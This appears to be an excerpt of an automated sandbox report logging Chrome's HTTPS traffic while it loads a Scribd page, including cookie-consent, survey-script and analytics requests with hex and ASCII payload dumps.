                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 38 38 2e 37 31 36 36 32 33 2c 31 38 2e 32 34 38 33 32 39 35 20 43 31 38 38 2e 37 31 36 36 32 33 2c 32 31 2e 36 37 39 32 36 38 38 20 31 38 36 2e 36 32 38 32 32 35 2c 32 33 2e 34 33 32 30 33 31 32 20 31 38 34 2e 35 37 37 31 32 2c 32 34 2e 33 32 37 30 35 38 38 20 43 31 38 37 2e 36 37 32 34 32 34 2c 32 35 2e 32 35 39 33 37 39 33 20 31 39 30 2e 31 37 31 30 34 33 2c 32 37 2e 30 34 39 34 33 34 35 20 31 39 30 2e 31 37 31 30 34 33 2c 33 30 2e 36 36 36 38 33 37 38 20 43 31 39 30 2e 31 37 31 30 34 33 2c 33 35 2e 31 37 39 32 36 38 38 20 31 38 36 2e 34 30 34 34 36 39 2c 33 37 2e 38 32 37 30 35 38 38 20 31 38 30 2e 36 39 38 36 36 37 2c 33 37 2e 38 32 37 30 35 38 38 20 4c 31 36 39 2e 31 30 30 36 30 31 2c 33 37 2e 38 32 37 30 35 38 38 20 4c 31 36 39 2e 31 30 30 36 30 31
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 88.716623,18.2483295 C188.716623,21.6792688 186.628225,23.4320312 184.57712,24.3270588 C187.672424,25.2593793 190.171043,27.0494345 190.171043,30.6668378 C190.171043,35.1792688 186.404469,37.8270588 180.698667,37.8270588 L169.100601,37.8270588 L169.100601
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 2e 35 38 36 37 38 36 32 2c 32 35 2e 35 33 31 38 38 36 31 20 43 31 37 2e 39 31 30 39 33 36 32 2c 32 34 2e 31 33 35 33 37 33 39 20 31 38 2e 35 37 34 30 30 34 34 2c 32 32 2e 34 36 33 33 32 35 33 20 31 38 2e 35 37 34 30 30 34 34 2c 32 30 2e 35 31 35 33 35 36 20 43 31 38 2e 35 37 34 30 30 34 34 2c 31 38 2e 35 31 36 36 36 30 34 20 31 37 2e 39 33 30 34 30 33 31 2c 31 36 2e 39 34 36 38 33 33 31 20 31 36 2e 36 34 35 35 38 34 33 2c 31 35 2e 38 30 36 36 34 32 37 20 43 31 35 2e 33 36 30 37 36 35 36 2c 31 34 2e 36 36 36 30 36 38 31 20 31 33 2e 39 39 30 31 33 33 33 2c 31 34 2e 30 39 35 37 38 30 38 20 31 32 2e 35 33 33 32 39 30 33 2c 31 34 2e 30 39 35 37 38 30 38 20 43 31 32 2e 30 38 32 37 36 39 34 2c 31 34 2e 30 39 35 37 38 30 38 20 31 31 2e 34 38 36 30 34 37 38 2c 31
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .5867862,25.5318861 C17.9109362,24.1353739 18.5740044,22.4633253 18.5740044,20.515356 C18.5740044,18.5166604 17.9304031,16.9468331 16.6455843,15.8066427 C15.3607656,14.6660681 13.9901333,14.0957808 12.5332903,14.0957808 C12.0827694,14.0957808 11.4860478,1
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC927INData Raw: 2e 34 36 30 39 34 32 32 2c 33 35 2e 33 34 33 34 34 31 39 20 33 32 2e 39 33 37 32 38 36 36 2c 33 35 2e 32 35 33 39 30 32 32 20 33 33 2e 31 37 36 34 35 32 2c 33 35 2e 32 35 33 39 30 32 32 20 43 33 34 2e 32 33 36 34 30 37 36 2c 33 35 2e 32 35 33 39 30 32 32 20 33 34 2e 37 36 35 31 39 33 35 2c 33 35 2e 38 39 34 31 33 30 34 20 33 34 2e 37 36 35 31 39 33 35 2c 33 37 2e 31 37 35 37 33 39 37 20 43 33 34 2e 37 36 35 31 39 33 35 2c 33 37 2e 36 33 37 36 35 37 31 20 33 34 2e 37 31 32 37 35 32 2c 33 38 2e 30 38 34 35 38 37 31 20 33 34 2e 36 31 33 38 32 38 31 2c 33 38 2e 35 31 38 34 35 31 32 20 43 33 32 2e 38 34 39 34 38 36 36 2c 34 32 2e 38 34 33 32 35 38 31 20 32 38 2e 33 32 37 35 39 32 2c 34 35 2e 33 31 35 30 31 35 36 20 32 31 2e 37 38 35 35 30 34 36 2c 34 35 2e 33
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .4609422,35.3434419 32.9372866,35.2539022 33.176452,35.2539022 C34.2364076,35.2539022 34.7651935,35.8941304 34.7651935,37.1757397 C34.7651935,37.6376571 34.712752,38.0845871 34.6138281,38.5184512 C32.8494866,42.8432581 28.327592,45.3150156 21.7855046,45.3


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        31192.168.2.164974852.222.144.74436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC620OUTPOST /record HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: consent.api.osano.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 226
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: application/json
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC226OUTData Raw: 7b 22 65 78 74 55 73 72 44 61 74 61 22 3a 22 22 2c 22 6f 73 6e 6f 43 75 73 74 6f 6d 65 72 49 64 22 3a 22 41 7a 5a 64 48 47 53 47 74 70 78 43 71 31 43 70 74 22 2c 22 6f 73 6e 6f 43 6f 6e 66 69 67 49 64 22 3a 22 34 65 31 30 62 31 33 35 2d 64 31 31 33 2d 34 35 37 34 2d 61 34 37 37 2d 32 37 30 61 63 65 34 30 62 62 61 37 22 2c 22 75 73 65 72 43 6f 6e 73 65 6e 74 49 64 22 3a 22 38 39 66 65 65 64 34 35 2d 36 61 65 37 2d 34 33 31 39 2d 38 63 36 34 2d 30 64 30 32 38 33 39 65 37 37 31 36 22 2c 22 63 6f 6e 73 65 6e 74 65 64 22 3a 22 45 53 53 45 4e 54 49 41 4c 2c 20 4d 41 52 4b 45 54 49 4e 47 2c 20 50 45 52 53 4f 4e 41 4c 49 5a 41 54 49 4f 4e 2c 20 41 4e 41 4c 59 54 49 43 53 22 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"extUsrData":"","osnoCustomerId":"AzZdHGSGtpxCq1Cpt","osnoConfigId":"4e10b135-d113-4574-a477-270ace40bba7","userConsentId":"89feed45-6ae7-4319-8c64-0d02839e7716","consented":"ESSENTIAL, MARKETING, PERSONALIZATION, ANALYTICS"}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC665INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Amzn-Trace-Id: Root=1-675373be-23b64cdc0dc80c7f454a365c
                                                                                                                                                                                                                                                                                                                                                                                        x-amzn-RequestId: ebcc2ab2-d83c-4f06-845e-74b64ce3b084
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: Accept, Authorization, Content-Length, Content-Type, Origin, X-Requested-With
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-apigw-id: CY8F2F9xIAMEZvA=
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST,OPTIONS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 1976c726f5a49e79daf18d11f7fa62da.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: MRS52-C2
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Id: adQq2R9v489UHMnx0eX3DXKcQL4byQOvcdT3ahtpM3YIISpJ00lnNA==


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        32192.168.2.164975089.35.237.1704436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC576OUTGET /workspaces/7de87bc73aff1974945059e230fb953d/web_surveys.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: survey.survicate.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1889INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 220
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        Server: BunnyCDN-RI1-892
                                                                                                                                                                                                                                                                                                                                                                                        CDN-PullZone: 1158558
                                                                                                                                                                                                                                                                                                                                                                                        CDN-Uid: 039640c0-4b09-428d-a0ae-513ccdd44502
                                                                                                                                                                                                                                                                                                                                                                                        CDN-RequestCountryCode: US
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=300
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "1eff6efeac587cff43f6dd5a15851140"
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 03 Dec 2024 19:36:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-id-2: y7J9CKIkzkMzuLV0cy4co+Y0fT09ANxoPYvEH7UaiOSq1USqJM7nBDUzISyg2lEYgcR4KbZKRiQ=
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-request-id: HEA2G9MB7W6N0XPT
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-version-id: TEWuJY3STFXSLjZSVy7O_P5dI_Suu3fK
                                                                                                                                                                                                                                                                                                                                                                                        CDN-ProxyVer: 1.06
                                                                                                                                                                                                                                                                                                                                                                                        CDN-RequestPullSuccess: True
                                                                                                                                                                                                                                                                                                                                                                                        CDN-RequestPullCode: 200
                                                                                                                                                                                                                                                                                                                                                                                        CDN-CachedAt: 12/03/2024 19:53:11
                                                                                                                                                                                                                                                                                                                                                                                        CDN-EdgeStorageId: 892
                                                                                                                                                                                                                                                                                                                                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                        report-to: { "group": "csp-endpoint-survey", "max_age": 10886400, "endpoints": [{ "url": "https://panel-api.survicate.com/_/report_csp/survey" }] }
                                                                                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'self' 'unsafe-inline' https://surveys-static.survicate.com https://surveys-static-prd.survicate-cdn.com; connect-src https://respondent.survicate.com 'self'; img-src https://*; font-src https://surveys-static.survicate.com https://surveys-static-prd.survicate-cdn.com https://use.typekit.net https://fonts.gstatic.com; report-to csp-endpoint-survey;
                                                                                                                                                                                                                                                                                                                                                                                        CDN-Status: 200
                                                                                                                                                                                                                                                                                                                                                                                        CDN-RequestTime: 1
                                                                                                                                                                                                                                                                                                                                                                                        CDN-RequestId: aedcfab2588db1c89b4ae07ac261cb20
                                                                                                                                                                                                                                                                                                                                                                                        CDN-Cache: REVALIDATED
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC220INData Raw: 76 61 72 20 5f 73 54 72 61 63 6b 69 6e 67 41 6c 72 65 61 64 79 50 72 65 73 65 6e 74 3d 28 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 5f 73 76 64 21 3d 3d 27 75 6e 64 65 66 69 6e 65 64 27 26 26 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 5f 73 76 63 21 3d 3d 27 75 6e 64 65 66 69 6e 65 64 27 29 3b 76 61 72 20 5f 73 76 63 3d 77 69 6e 64 6f 77 2e 5f 73 76 63 7c 7c 7b 7d 3b 76 61 72 20 5f 73 76 64 3d 77 69 6e 64 6f 77 2e 5f 73 76 64 7c 7c 7b 7d 3b 5f 73 76 63 2e 77 6f 72 6b 73 70 61 63 65 4b 65 79 3d 5f 73 76 63 2e 77 6f 72 6b 73 70 61 63 65 4b 65 79 7c 7c 27 37 64 65 38 37 62 63 37 33 61 66 66 31 39 37 34 39 34 35 30 35 39 65 32 33 30 66 62 39 35 33 64 27 3b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: var _sTrackingAlreadyPresent=(typeof window._svd!=='undefined'&&typeof window._svc!=='undefined');var _svc=window._svc||{};var _svd=window._svd||{};_svc.workspaceKey=_svc.workspaceKey||'7de87bc73aff1974945059e230fb953d';


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        33192.168.2.1649753151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC592OUTPOST /log/dd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: wa.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 190
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC190OUTData Raw: 7b 22 74 79 70 65 22 3a 22 69 6e 63 72 65 6d 65 6e 74 22 2c 22 6d 65 74 72 69 63 22 3a 22 66 65 61 74 75 72 65 22 2c 22 74 61 67 73 22 3a 7b 22 62 72 61 6e 64 22 3a 22 73 63 72 69 62 64 22 2c 22 61 63 74 69 6f 6e 22 3a 22 70 61 67 65 5f 6c 6f 61 64 5f 73 74 61 74 73 22 2c 22 70 61 67 65 22 3a 22 64 6f 63 5f 70 61 67 65 22 2c 22 69 73 4d 6f 62 69 6c 65 43 6c 69 65 6e 74 22 3a 22 66 61 6c 73 65 22 2c 22 69 73 4d 6f 62 69 6c 65 53 65 72 76 65 72 22 3a 22 66 61 6c 73 65 22 2c 22 70 61 67 65 4f 72 69 65 6e 74 61 74 69 6f 6e 22 3a 22 6c 61 6e 64 73 63 61 70 65 22 7d 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"type":"increment","metric":"feature","tags":{"brand":"scribd","action":"page_load_stats","page":"doc_page","isMobileClient":"false","isMobileServer":"false","pageOrientation":"landscape"}}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 17
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                        server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740075-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC17INData Raw: 7b 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 7d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"success":true}


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        34192.168.2.1649755151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC592OUTPOST /log/dd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: wa.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 139
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC139OUTData Raw: 7b 22 74 79 70 65 22 3a 22 69 6e 63 72 65 6d 65 6e 74 22 2c 22 6d 65 74 72 69 63 22 3a 22 66 65 61 74 75 72 65 22 2c 22 74 61 67 73 22 3a 7b 22 62 72 61 6e 64 22 3a 22 73 63 72 69 62 64 22 2c 22 61 63 74 69 6f 6e 22 3a 22 63 6f 6e 73 65 6e 74 5f 64 69 61 6c 6f 67 5f 76 69 73 69 62 6c 65 22 2c 22 70 61 67 65 22 3a 22 64 6f 63 5f 70 61 67 65 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 76 32 30 32 34 2e 35 2e 34 22 7d 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"type":"increment","metric":"feature","tags":{"brand":"scribd","action":"consent_dialog_visible","page":"doc_page","version":"v2024.5.4"}}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 17
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                        server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740039-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC17INData Raw: 7b 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 7d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"success":true}


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        35192.168.2.1649754151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC508OUTOPTIONS /api/v1/events HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: wa.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-methods: POST
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                        server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-nyc-kteb1890098-NYC
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Origin,Access-Control-Request-Method,Access-Control-Request-Headers
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        36192.168.2.1649756188.125.88.2064436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:27 UTC559OUTGET /wi/config/10143699.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
